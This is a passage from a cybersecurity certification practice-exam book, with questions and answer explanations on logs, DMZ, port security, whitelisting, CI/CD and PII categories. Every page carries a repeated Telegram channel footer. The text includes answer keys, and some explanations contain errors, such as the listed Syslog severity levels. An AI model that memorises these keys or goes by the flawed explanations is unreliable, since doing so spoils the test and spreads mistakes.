(C) Continuous monitoring
(D) Continuous delivery

Question 41. Which of the following sources of information

would provide you with the most accurate information for you
to use in determining which network service has been stopped
working on the company’s network?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis

86
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 42. You are conducting a log review scan to detect
the users who have been locked out from their accounts in or-
der to proceed to the recovery stage. Which of the following
sources of information would provide you with the most accu-
rate information for you to use in determining who has been
locked out or not?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis

Question 43. You have been tasked to implement a solution to

allow users from untrusted networks to access the Web Server
and the Mail Server while keeping the private network secured
and inaccessible. Which of the following do you need to im-
plement to complete the task?
(A) IDS
(B) IPS
(C) DMZ
(D) VPN

87
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 44. You have been tasked to improve the wired net-
work security of the company’s network by limiting the number
of MAC addresses on a given port. Packets that have a match-
ing MAC address should be considered secure packets and
should be forwarded; all other packets (unsecured packets)
should be restricted. Which of the following features should
you implement to complete the task?
(A) Port security
(B) Network access control
(C) Sinkholing
(D) Sandboxing

Question 45. A new social media app was launched recently

that accepts all users worldwide by default. A cybersecurity
analyst after reviewing the firewall logs detects that users from
specific countries have conducted a cyber attack on the app.
Which of the following access control method should the ana-
lyst recommend to the developers?
(A) Sandboxing
(B) Whitelisting
(C) Port security
(D) Blacklisting

88
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 46. What problems can be caused by malicious pay-
loads? (Choose all that apply.)
(A) Activity monitoring
(B) File encryption
(C) File deletion
(D) Malicious file download
(D) Steal online banking details

Question 47. Which of the following options is a dictionary that

provides definitions for publicly disclosed cybersecurity vulner-
abilities and exposures?
(A) Log aggregation
(B) Security Orchestration, Automation, and Response
(C) Sentiment analysis
(D) Common Vulnerabilities and Exposures

89
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 48. A developer is building a new corporate applica-
tion that needs to be accessed only by selective employees
based on their IP addresses. Which of the following access
control method should the developer implement?
(A) Blacklisting
(B) Port security
(C) Whitelisting
(D) Sandboxing

Question 49. Which of the following methods should you use

to deal with the huge volume of new threats seen daily?
(A) Intrusion detection system
(B) Network access control
(C) Heuristics analysis
(D) Intrusion prevention system

90
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 50. Which of the following actions should you per-
form to reduce the attack surface area of a given network or
system? (Choose all that apply.)
(A) Keep your software up to date
(B) Run a local firewall and don’t open ports you don’t need
(C) Run applications as root or as an administrator
(D) Use TLS for all network communication, even internally
(Ε) Don't sanitize configurations and inputs

91
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 36-50

Question 36. Which of the following protocols is commonly

used to collect information about CPU utilization and band-
width from network devices and automatically send the admin-
istrator an email if a predefined threshold is exceeded?
(A) HTTP
(B) SNMP
(C) DHCP
(D) SMTP

Explanation 36. SNMP is the correct answer. Simple Net-

work Management Protocol (SNMP) is a networking protocol
used for the management and monitoring of network-connect-
ed devices in Internet Protocol networks. The SNMP protocol is
embedded in multiple local devices such as routers, switches,
servers, firewalls, and wireless access points accessible using
their IP address.

SNMP tools perform many functions that rely on a mix of push

and pull communications between network devices and the
network management system. At its core set of functions, it can
execute read or write commands, such as resetting a password
or changing a configuration setting. It can also find how much
92
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
network bandwidth, CPU and memory are in use. Some SNMP
managers can automatically send the administrator an email or
text message alert if a predefined threshold is exceeded.

HTTP is incorrect. HTTP is a protocol which allows the fetch-

ing of resources, such as HTML documents. It is the foundation
of any data exchange on the Web and it is a client-server pro-
tocol, which means requests are initiated by the recipient, usu-
ally the Web browser.

DHCP is incorrect. A DHCP Server is a network server that au-

tomatically provides and assigns IP addresses, default gate-
ways and other network parameters to client devices.

SMTP is incorrect. An SMTP (Simple Mail Transfer Protocol) is

a protocol that’s primary purpose is to send, receive, and/or re-
lay outgoing mail between email senders and receivers.

93
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 37. You have set up an Intrusion detection system
(IDS) and suddenly the IDS identifies an activity as an attack
but the activity is acceptable behavior. The state, in this case, is
known as:
(A) False-positive
(B) False-negative
(C) Non-credentialed scans
(D) Credentialed scans

Explanation 37. False positive is the correct answer. A false

positive state is when the IDS identifies an activity as an attack
but the activity is acceptable behavior. A false positive is a false
alarm.

False negative is incorrect. A False-negative state is the most

serious and dangerous state. This is when the IDS identifies an
activity as acceptable when the activity is actually an attack.
That is, a false negative is when the IDS fails to catch an attack.

Non-credentialed scans is incorrect. Non-credentialed as

the name suggests, do not require credentials and do not get
trusted access to the systems they are scanning. While they
provide an outsider’s eye view of an environment, they tend to
miss most vulnerabilities within a target environment. So, while
they can provide some valuable insights to a potential attacker
as well as to a security professional trying to gauge the risk
94
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
from the outside, non-credentialed scans give a very incom-
plete picture of vulnerability exposure.

Credentialed scans is incorrect. Credentialed requires log-

ging in with a given set of credentials. These authenticated
scans are conducted with a trusted user’s eye view of the envi-
ronment. Credentialed scans uncover many vulnerabilities that
traditional (non-credentialed) scans might overlook.

Question 38. During a vulnerability scan, you found a serious

SQL injection vulnerability in one of your online shop that has
10,000 daily visitors. The eshop provides 99.999% availability
to customers so it can’t be taken offline to fix the SQL injection
vulnerability. Which of the following solutions should you rec-
ommend to the eshop administrators until the eshop can be
remediated?
(A) Port security
(B) WAF
(C) Honeypot
(D) Sandboxing

Explanation 38. WAF is the correct answer. A WAF or Web

Application Firewall helps protect web applications by filtering
and monitoring HTTP traffic between a web application and the

95
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Internet. It typically protects web applications from attacks
such as cross-site forgery, cross-site-scripting (XSS), file inclu-
sion, and SQL injection, among others. A WAF is a protocol lay-
er 7 defense (in the OSI model), and is not designed to defend
against all types of attacks.

Port Security is incorrect. Port Security helps secure the net-

work by preventing unknown devices from forwarding packets.
When a link goes down, all dynamically locked addresses are
freed. The port security feature offers the following benefits:

1. You can limit the number of MAC addresses on a given port.

Packets that have a matching MAC address (secure packets)
are forwarded; all other packets (unsecured packets) are re-
stricted.
2. You can enable port security on a per-port basis.

Honeypot is incorrect. The honeypot looks like a real comput-

er system, with applications and data, fooling cybercriminals
into thinking it’s a legitimate target. For example, a honeypot
could mimic a company’s customer billing system – a frequent
target of attack for criminals who want to find credit card num-
bers. Once the hackers are in, they can be tracked, and their
behavior assessed for clues on how to make the real network
more secure.

96
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Sandboxing is incorrect. Sandboxing is a software manage-
ment strategy that isolates applications from critical system re-
sources and other programs. It provides an extra layer of secu-
rity that prevents malware or harmful applications from nega-
tively affecting your system.

Question 39. The developers of your company for efficiency

Explanation 39. Continuous deployment is the correct an-

swer. Continuous deployment is a software development
method that releases or deploys software automatically into the
production environment. In this model, no one manually checks
the code and pushes it into your app.

Obviously, you have to know whether or not the code being

deployed is free from bugs and errors before it’s in the hands of

97
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
end-users — your customers. But this, too, can be done by
software. Code is automatically tested for issues, and if none
are found, then the code is deployed.

Continuous integration is incorrect. Continuous Integration

(CI) is a development practice where developers integrate code
into a shared repository frequently, preferably several times a
day. Each integration can then be verified by an automated
build and automated tests. While automated testing is not
strictly part of CI it is typically implied.

Continuous integration is designed to trigger automatic code

integration in the main code base instead of developing in iso-
lation and then integrating them at the end of the development
cycle.

Continuous monitoring is incorrect. Continuous monitoring

provides security and operations analysts with real-time feed-
back on the overall health of IT infrastructure, including net-
works and applications deployed in the cloud.

The goal of continuous monitoring is to increase the visibility

and transparency of network activity, especially suspicious
network activity that could indicate a security breach, and to
mitigate the risk of cyber attacks with a timely alert system that
triggers a rapid incident response.

98
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Continuous delivery is incorrect. Continuous delivery is an
ongoing DevOps practice of building, testing, and delivering
improvements to software code and user environments with
the help of automated tools. The key outcome of the continu-
ous delivery (CD) paradigm is code that is always in a deploy-
able state.

Question 40. Which of the following process is designed to

trigger automatic code integration in the main code base in-
stead of developing in isolation and then integrating them at
the end of the development cycle?
(A) Continuous deployment
(B) Continuous integration
(C) Continuous monitoring
(D) Continuous delivery

Explanation 40. Continuous integration is correct. Continu-

ous Integration (CI) is a development practice where develop-
ers integrate code into a shared repository frequently, prefer-
ably several times a day. Each integration can then be verified
by an automated build and automated tests. While automated
testing is not strictly part of CI it is typically implied.

99
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Continuous integration is designed to trigger automatic code
integration in the main code base instead of developing in iso-
lation and then integrating them at the end of the development
cycle.

Continuous deployment is incorrect. Continuous deploy-

ment is a software development method that releases or de-
ploys software automatically into the production environment.
In this model, no one manually checks the code and pushes it
into your app.

Obviously, you have to know whether or not the code being

deployed is free from bugs and errors before it’s in the hands of
end-users — your customers. But this, too, can be done by
software. Code is automatically tested for issues, and if none
are found, then the code is deployed.

Continuous monitoring is incorrect. Continuous monitoring

provides security and operations analysts with real-time feed-
back on the overall health of IT infrastructure, including net-
works and applications deployed in the cloud.

The goal of continuous monitoring is to increase the visibility

and transparency of network activity, especially suspicious
network activity that could indicate a security breach, and to

100
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
mitigate the risk of cyber attacks with a timely alert system that
triggers a rapid incident response.

Continuous delivery is incorrect. Continuous delivery is an

ongoing DevOps practice of building, testing, and delivering
improvements to software code and user environments with
the help of automated tools. The key outcome of the continu-
ous delivery (CD) paradigm is code that is always in a deploy-
able state.

Question 41. Which of the following sources of information

Explanation 41. Syslog is the correct answer. Syslog is a

Message Logging Standard by which almost any device or ap-
plication can send data about status, events, diagnostics, and
more.

101
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Syslog messages have a built-in severity level, facilitating any-
thing from level 0, an Emergency, to level 5, a Warning, and
then on to level 6 and level 7, which are Informational and De-
bugging, respectively.

Event logs is incorrect. An event log is a more basic resource

that stores different types of information based on specific
events. These events include:
1. Failed password attempts
2. Locked accounts
3. Network login sessions
4. Application errors
5. Unexpected application closures
6. Event logs can be used to troubleshoot problems with secu-
rity management, application installations, and more.

Firewall logs is incorrect. To be most effective, a firewall rule-

set must be augmented with a successful logging feature. The
logging feature documents how the firewall deals with traffic
types. These logs offer insights into, for example, source and
destination IP addresses, protocols, and port numbers.

Flow analysis is incorrect. Network flow analysis is the art of

studying the traffic on a computer network. Understanding the
ways to export flow and collect and analyze data separates
good network administrators from great ones.
102
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 42. You are conducting a log review scan to detect
the users who have been locked out from their accounts in or-
der to proceed to the recovery stage. Which of the following
sources of information would provide you with the most accu-
rate information for you to use in determining who has been
locked out or not?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis

Explanation 42. Event logs is the correct answer. An event

log is a more basic resource that stores different types of infor-
mation based on specific events. These events include:
1. Failed password attempts
2. Locked accounts
3. Network login sessions
4. Application errors
5. Unexpected application closures
6. Event logs can be used to troubleshoot problems with secu-
rity management, application installations, and more.

Firewall logs is incorrect. To be most effective, a firewall rule-

set must be augmented with a successful logging feature. The
103
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
logging feature documents how the firewall deals with traffic
types. These logs offer insights into, for example, source and
destination IP addresses, protocols, and port numbers.

Syslog is incorrect. Syslog is a Message Logging Standard by

which almost any device or application can send data about
status, events, diagnostics, and more.

Syslog messages have a built-in severity level, facilitating any-

thing from level 0, an Emergency, to level 5, a Warning, and
then on to level 6 and level 7, which are Informational and De-
bugging, respectively.

Flow analysis is incorrect. Network flow analysis is the art of

studying the traffic on a computer network. Understanding the
ways to export flow and collect and analyze data separates
good network administrators from great ones.

104
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 43. You have been tasked to implement a solution to
allow users from untrusted networks to access the Web Server
and the Mail Server while keeping the private network secured
and inaccessible. Which of the following do you need to im-
plement to complete the task?
(A) IDS
(B) IPS
(C) DMZ
(D) VPN

Explanation 43. DMZ is the correct answer. A DMZ, short for

a demilitarized zone, is a network (physical or logical) used to
connect hosts that provide an interface to an untrusted external
network – usually the internet – while keeping the internal, pri-
vate network – usually the corporate network – separated and
isolated from the external network.

The ultimate goal of a DMZ is to allow access to resources from

untrusted networks while keeping the private network secured.
Resources commonly placed in the DMZ include Web servers,
Mail servers, FTP servers, and VoIP servers.

IDS is incorrect. An intrusion detection system (IDS) is a de-

vice or software application that monitors a network for mali-
cious activity or policy violations.

105
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
IPS is incorrect. An intrusion prevention system (IPS) is a form
of network security that works to detect and prevent identified
threats. Intrusion prevention systems continuously monitor your
network, looking for possible malicious incidents and capturing
information about them.

Virtual private network is incorrect. A virtual private network,

or VPN, is an encrypted connection over the Internet from a de-
vice to a network. The encrypted connection helps ensure that
sensitive data is safely transmitted.

Question 44. You have been tasked to improve the wired net-
work security of the company’s network by limiting the number
of MAC addresses on a given port. Packets that have a match-
ing MAC address should be considered secure packets and
should be forwarded; all other packets (unsecured packets)
should be restricted. Which of the following features should
you implement to complete the task?
(A) Port security
(B) Network access control
(C) Sinkholing
(D) Sandboxing

106
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 44. Port security is the correct answer. Port
Security helps secure the network by preventing unknown de-
vices from forwarding packets. When a link goes down, all dy-
namically locked addresses are freed. The port security feature
offers the following benefits:
- You can limit the number of MAC addresses on a given port.
Packets that have a matching MAC address (secure packets)
are forwarded; all other packets (unsecure packets) are restrict-
ed.

- You can enable port security on a per-port basis.

Network access control is incorrect. Network access control is

the act of keeping unauthorized users and devices out of a pri-
vate network. Organizations that give certain devices or users
from outside of the organization occasional access to the net-
work can use network access control to ensure that these de-
vices meet corporate security compliance regulations.

Sinkholing is incorrect. Sinkholing is a technique for manipu-

lating data flow in a network; you redirect traffic from its intend-
ed destination to the server of your choosing. It can be used
maliciously, to steer legitimate traffic away from its intended re-
cipient.

107
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Sandboxing is incorrect. Sandboxing is incorrect. Sandboxing
is a software management strategy that isolates applications
from critical system resources and other programs. It provides
an extra layer of security that prevents malware or harmful ap-
plications from negatively affecting your system.

Question 45. A new social media app was launched recently

Explanation 45. Blacklisting is the correct answer. Blacklist-

ing means accepting most entities, but excluding those you
believe to be malicious or otherwise wish to avoid. Traditionally,
blacklisting has been the most common approach security
teams use for securing their networks or environments.

108
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Whitelisting is incorrect. Whitelisting refers to the practice of
blocking all entities except those that are explicitly allowed to
communicate with you or your infrastructure. Whitelisting
makes more sense in situations where you do not want a ser-
vice to be public.

Port Security is incorrect. Port Security helps secure the net-

work by preventing unknown devices from forwarding packets.
When a link goes down, all dynamically locked addresses are
freed. The port security feature offers the following benefits:

1. You can limit the number of MAC addresses on a given port.

Packets that have a matching MAC address (secure packets)
are forwarded; all other packets (unsecure packets) are restrict-
ed.
2. You can enable port security on a per-port basis.

Sandboxing is incorrect. Sandboxing is a software manage-

ment strategy that isolates applications from critical system re-
sources and other programs. It provides an extra layer of secu-
rity that prevents malware or harmful applications from nega-
tively affecting your system.

109
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 46. What problems can be caused by malicious pay-
loads? (Choose all that apply.)
(A) Activity monitoring
(B) File encryption
(C) File deletion
(D) Malicious file download
(D) Steal online banking details

Explanation 46. The correct answers are:

1. Activity monitoring
2. File encryption
3. File deletion
4. Malicious file download

A malicious payload is an attack component responsible for ex-

ecuting an activity to harm the target. Some common examples
of malicious payloads are worms, ransomware, and other mal-
ware that arrive on computers by clicking bad links or down-
loading harmful attachments.

Malicious payloads can cause several problems that include:

1. Data theft: Most cybercriminals steal sensitive data, such as

110
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
2. Activity monitoring: Once a malicious payload, such as
spyware, is executed, a hacker can monitor all of a user’s ac-
tivities.

3. File encryption: Ransomware is typically used as malicious

payloads to encrypt or change the access to data contained
within a target computer.

4. File deletion: The ExploreZip worm is a malicious payload

designed to delete files from an infected Windows computer
discovered in 1999.

5. Malicious file download: Malicious payloads can also

download other malware onto an infected computer to ren-
der it unusable. Trojan-Downloader is an example of this.

6. Unwanted ad display: Once triggered, the adware can per-

sistently display pop-up ads. One such malicious payload is
DollarRevenue.

7. Running unauthorized background processes: Many ma-

licious payloads run silently in the background to spy on its
user or slow down a computer’s performance. They are typi-
cally backdoors that leave systems under the control of at-
tackers.

111
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 47. Which of the following options is a dictionary that
provides definitions for publicly disclosed cybersecurity vulner-
abilities and exposures?
(A) Log aggregation
(B) Security Orchestration, Automation, and Response
(C) Sentiment analysis
(D) Common Vulnerabilities and Exposures

Explanation 47. Common Vulnerabilities and Exposures is

the correct answer. Common Vulnerabilities and Exposures
(CVE) is a dictionary that provides definitions for publicly dis-
closed cybersecurity vulnerabilities and exposures. The goal of
CVE is to make it easier to share data across separate vulnera-
bility capabilities (tools, databases, and services) with these
definitions. CVE Entries are comprised of an identification num-
ber, a description, and at least one public reference.

Log aggregation is incorrect. Log aggregation is a software

function that consolidates log data from throughout the IT in-
frastructure into a single centralized platform where it can be
reviewed and analyzed. Log aggregation is just one aspect of
an overall log management process that produces real-time in-
sights into application security and performance.

Sentiment analysis is incorrect. Sentiment analysis helps

data analysts within large enterprises gauge public opinion,
112
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
conduct nuanced market research, monitor brand and product
reputation, and understand customer experiences.

Security Orchestration, Automation and Response (SOAR)

is incorrect. SOAR is a solution stack of compatible software
programs that allow an organization to collect data about secu-
rity threats from multiple sources and respond to low-level se-
curity events without human assistance. The goal of using a
SOAR stack is to improve the efficiency of physical and digital
security operations.

Question 48. A developer is building a new corporate applica-

tion that needs to be accessed only by selective employees
based on their IP addresses. Which of the following access
control method should the developer implement?
(A) Blacklisting
(B) Port security
(C) Whitelisting
(D) Sandboxing

Explanation 48. Whitelisting is the correct

answer. Whitelisting refers to the practice of blocking all enti-
ties except those that are explicitly allowed to communicate

113
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
with you or your infrastructure. Whitelisting makes more sense
in situations where you do not want a service to be public.

Blacklisting is incorrect. Blacklisting means accepting most

entities, but excluding those you believe to be malicious or oth-
erwise wish to avoid.

Port Security is incorrect. Port Security helps secure the net-

work by preventing unknown devices from forwarding packets.
When a link goes down, all dynamically locked addresses are
freed. The port security feature offers the following benefits:

1. You can limit the number of MAC addresses on a given port.

Packets that have a matching MAC address (secure packets)
are forwarded; all other packets (unsecure packets) are restrict-
ed.
2. You can enable port security on a per-port basis.

Sandboxing is incorrect. Sandboxing is a software manage-

114
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 49. Which of the following methods should you use
to deal with the huge volume of new threats seen daily?
(A) Intrusion detection system
(B) Network access control
(C) Heuristics analysis
(D) Intrusion prevention system

Explanation 49. Heuristics analysis is the correct

answer. Heuristic analysis is a method of detecting viruses by
examining code for suspicious properties.

Traditional methods of virus detection involve identifying mal-

ware by comparing code in a program to the code of known
virus types that have already been encountered, analyzed, and
recorded in a database – known as signature detection.

Intrusion detection system is incorrect. An intrusion detec-

tion system (IDS) is a device or software application that moni-
tors a network or systems for malicious activity or policy viola-
tions.

Network access control is incorrect. Network access control

is the act of keeping unauthorized users and devices out of a
private network. Organizations that give certain devices or
users from outside of the organization occasional access to the

115
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
network can use network access control to ensure that these
devices meet corporate security compliance regulations.

Intrusion prevention system is incorrect. An intrusion pre-

vention system (IPS) is a form of network security that works to
detect and prevent identified threats. Intrusion prevention sys-
tems continuously monitor your network, looking for possible
malicious incidents and capturing information about them.

Question 50. Which of the following actions should you per-

form to reduce the attack surface area of a given network or
system? (Choose all that apply.)
(A) Keep your software up to date
(B) Run a local firewall and don’t open ports you don’t need
(C) Run applications as root or as an administrator
(D) Use TLS for all network communication, even internally
(Ε) Don't sanitize configurations and inputs

Explanation 50. The correct answers are:

1. Keep your software up to date
2. Run a local firewall and don’t open ports you don’t need
3. Use TLS for all network communication, even internally

An attack surface is simply the number of possible ways an at-

tacker can get into a device or network and extract data. Al-
116
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
ways keep your software up to date. New vulnerabilities are
found constantly and unless they are zero-day exploits that you
can’t prevent, the overwhelming majority of hacks make use of
older software that simply wasn’t updated.

Run a local firewall and don’t open ports you don’t

need. Even when you’re not on the internet, there is no reason
to allow everything into the machine. If an attacker (or insider
threat) has access to one host on your network, it should be
hard for them to move laterally to other assets.

Use TLS for all network communication, even internally. An in-

sider threat or compromised machine could read any unen-
crypted data sent on that network. A self-signed certificate is
much better than no certificate.

117
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 4
INCIDENT RESPONSE

Questions 51-65

118
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 51. Your co-worker Jax is constantly complaining
about the slow network performance on his workstation. Which
of the following are common activities that cause bandwidth
problems on Jax’s network? (Choose all that apply.)
(A) Streaming videos
(B) Large file transfers between computers
(C) Mobile data is on
(D) Downloading files from the internet
(Ε) Wireless SSID is hidden

Question 52. Which of the following categories would contain

information that can be used to identify a specific individual
such as social security numbers and phone numbers?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

119
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 53. A company follows the data retention policy as it
is a framework of rules for holding, storing, and deleting the in-
formation it generates. The company’s policy states the ac-
counting-related data is stored for a period of 3 years before
the permanent deletion. Which of the following process does
the company follow to destroy the data?
(A) Sanitization
(B) Secure disposal
(C) Patching
(D) Downtime

Question 54. Wireshark is a command-line utility that allows

you to capture and analyze network traffic going through your
system. It is often used to help troubleshoot network issues, as
well as a security tool. (TRUE/FALSE)
(A) TRUE
(B) FALSE

120
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 55. You have been hired to investigate an activity
from an attacker who compromised a host on the company’s
network. The attacker used credentials from an employee to
breach the system. After a while, he gained access to a Linux
server and he started using sudo commands to perform mali-
cious activities. What sort of attack the attacker used?
(A) Pharming
(B) Authentication Hijacking
(C) Injection Attacks
(D) Privilege escalation

Question 56. Which of the following process describes how

long businesses need to keep a piece of information (a record),
where it’s stored, and how to dispose of the record when its
time?
(A) Disaster recovery plan
(B) Business continuity plan
(C) Incident response team
(D) Retention policy

121
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 57. An information system which is so critical to an
organization that in case of corruption or loss of access to it
would have a serious impact on the organization’s ability to
conduct business is known as?
(A) High-Value Asset
(B) Data exfiltration
(C) Legal hold
(D) Security procedure

Question 58. Which of the following categories would contain

information about an individual’s biometric data, genetic infor-
mation, and sexual orientation?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

122
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 59. One station on the network notifies the other
station on the network in a ring fashion when they are not re-
ceiving the transmission signals with the aim of self-repairing
network problems. This process is known as?
(A) Beaconing
(B) Data loss prevention
(C) Βlacklisting
(D) Whitelisting

Question 60. The IT team of a company has just implemented

a bandwidth monitoring solution to identify alarming and sud-
den network spikes in their network traffic. What might be the
cause of the unusual network spikes in their network? (Choose
all that apply.)
(A) Remote backup tools
(B) Malware outbreaks
(C) DNS server issues
(D) Mail server problems
(E) WiFi interference

123
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 61. A cybersecurity analyst follows an incident re-
sponse plan to remediate a threat. After eradicating the mal-
ware from a victimized system which of the following actions
the analyst should perform NEXT as part of the recovery
process?
(A) Reconstitution of resources
(B) Restoration of capabilities and services
(C) Restoration of permissions
(D) Verification of logging

Question 62. Which of the following categories would contain

information about an individual’s demographic information,
medical histories, laboratory results, and mental health condi-
tions?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property

124
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 63. Your company is using Wireshark as a network
protocol analyzer. The workstation with an IP address of
192.168.0.6 consumes too much bandwidth from the network
without an obvious reason. Which of the following display filters
should you use to display packets to or from the IP address
192.168.0.6?
(A) ip.addr=192.168.0.6
(B) ip.dst==192.168.0.6
(C) ip.addr==192.168.0.6
(D) ip.src==192.168.0.6

Question 64. The private IP range of the accounting depart-

ment is 192.168.0.5 – 192.168.0.10. The hosts with IP address
192.168.0.7 and 192.168.0.9 aren’t able to connect to examsdi-
gest.com by its domain name but only by its public IP address
(145.34.2.7). Which of the following tools should you use to
find out if these hosts have opened port 54?
(A) Sanitization
(B) Reverse engineering
(C) Sweep scan
(D) Endpoint detection and response

125
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 65. Your co-worker Marie sent you the following
screenshot. She states that each time she opens her worksta-
tion the usage of the RAM reaches 90% – 99% and the error
“Your computer is low on memory” popping up. Which of the
following might be the cause of high memory usage? (Choose
all that apply.)

(A) Insufficient disk space

(B) Network Interface Controller issues
(C) Startup programs
(D) A USB port is open
(E) Defective program design

126
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
127
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 51-65

Question 51. Your co-worker Jax is constantly complaining

about the slow network performance on his workstation. Which
of the following are common activities that cause bandwidth
problems on Jax’s network? (Choose all that apply.)
(A) Streaming videos
(B) Large file transfers between computers
(C) Mobile data is on
(D) Downloading files from the internet
(Ε) Wireless SSID is hidden

Explanation 51. The correct answers are:

1. Streaming videos
2. Large file transfers between computers
3. Downloading files from the internet

Bandwidth Issues can almost always be traced to one or two

specific activities. These activities almost always have two
characteristics: large amounts of data, and extended duration.
Common activities causing bandwidth problems are:
- Watching videos from the Internet (YouTube, Netflix)
- Large file transfers between computers (greater than 100
megabytes in size)
- A constant stream of data (surveillance footage from security
128
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
cameras)
- Downloading files from the internet

All of the above can contribute greatly to bandwidth issues in a

network, and should be done only when there is only light net-
work traffic. Large file transfers or data streams within a net-
work should be placed on a separate network, in order to avoid
bottlenecking other users.

Question 52. Which of the following categories would contain

Explanation 52. Personally identifiable information is the

correct answer. Personally identifiable information (PII) is any
data that can be used to identify a specific individual. Social
Security numbers, mailing or email addresses, and phone
numbers have most commonly been considered PII, but tech-
nology has expanded the scope of PII considerably. It can in-
clude an IP address, login IDs, social media posts, or digital im-
129
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
ages. Geolocation, biometric, and behavioral data can also be
classified as PII.

Protected health information is incorrect. Protected health

information (PHI), also referred to as personal health informa-
tion, generally refers to demographic information, medical his-
tories, test and laboratory results, mental health conditions, in-
surance information, and other data that a healthcare profes-
sional collects to identify an individual and determine appropri-
ate care.

Sensitive Personal Information is incorrect. Sensitive Per-

sonal Information (SPI) refers to information that does not iden-
tify an individual, but is related to an individual, and communi-
